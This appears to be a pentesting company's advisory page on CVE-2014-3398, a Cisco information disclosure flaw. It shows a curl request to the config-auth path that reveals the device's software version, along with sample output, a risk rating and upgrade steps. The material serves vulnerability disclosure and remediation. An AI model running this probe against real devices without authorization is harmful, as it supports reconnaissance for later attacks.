Network Penetration Testing

Cisco Information Disclosure (CVE-2014-3398 – CSCuq65542)

our services

Vulnerability Details

CVE-2014-3398 (or Cisco CSCuq65542) is an information disclosure vulnerability disclosing the version of IOS. By identifying specific IOS versions, an attacker can determine exactly what vulnerabilities may affect a particular system. It may also be used by malicious actors to catalogue the system for future attacks when new vulnerabilities are discovered.

Exploiting CVE-2014-3398

Exploitation can be made with a browser or a curl command. A HTTP GET request can be made to the following URL:

https://{IP}/CSCOSSLC/config-auth

Or using Curl:

$ curl https://{IP}/CSCOSSLC/config-auth --insecure
<?xml version="1.0" encoding="UTF-8"?>
<config-auth client="vpn" type="complete">
<version who="sg">8.6(1)2</version>
<error id="96" param1="" param2="">VPN Server internal error.</error>
</config-auth>

Risk Assessment

CVE-2014-3398 is rated as Medium Risk for external networks and Low Risk for internal networks. Although the information disclosed is minimal, the specific CIsco versions should never be revealed during normal operation. It may also provide valuable details for performing future attacks.

Remediation

Cisco has provided a detailed upgrade guide for IOS devices. Most upgrades will follow the following steps:

  • Configure a TFTP server.
  • Download the IOS images.
  • Connect to the router via serial.
  • Install and configure IOS.

The complete guide can be found here:
https://www.cisco.com/c/en/us/support/docs/routers/3800-series-integrated-services-routers/49044-sw-upgrade-proc-ram.html

We
Are
Changing
The
Way
Pentesting
Is
Done
  • Application
  • Network
  • Mobile
  • AWS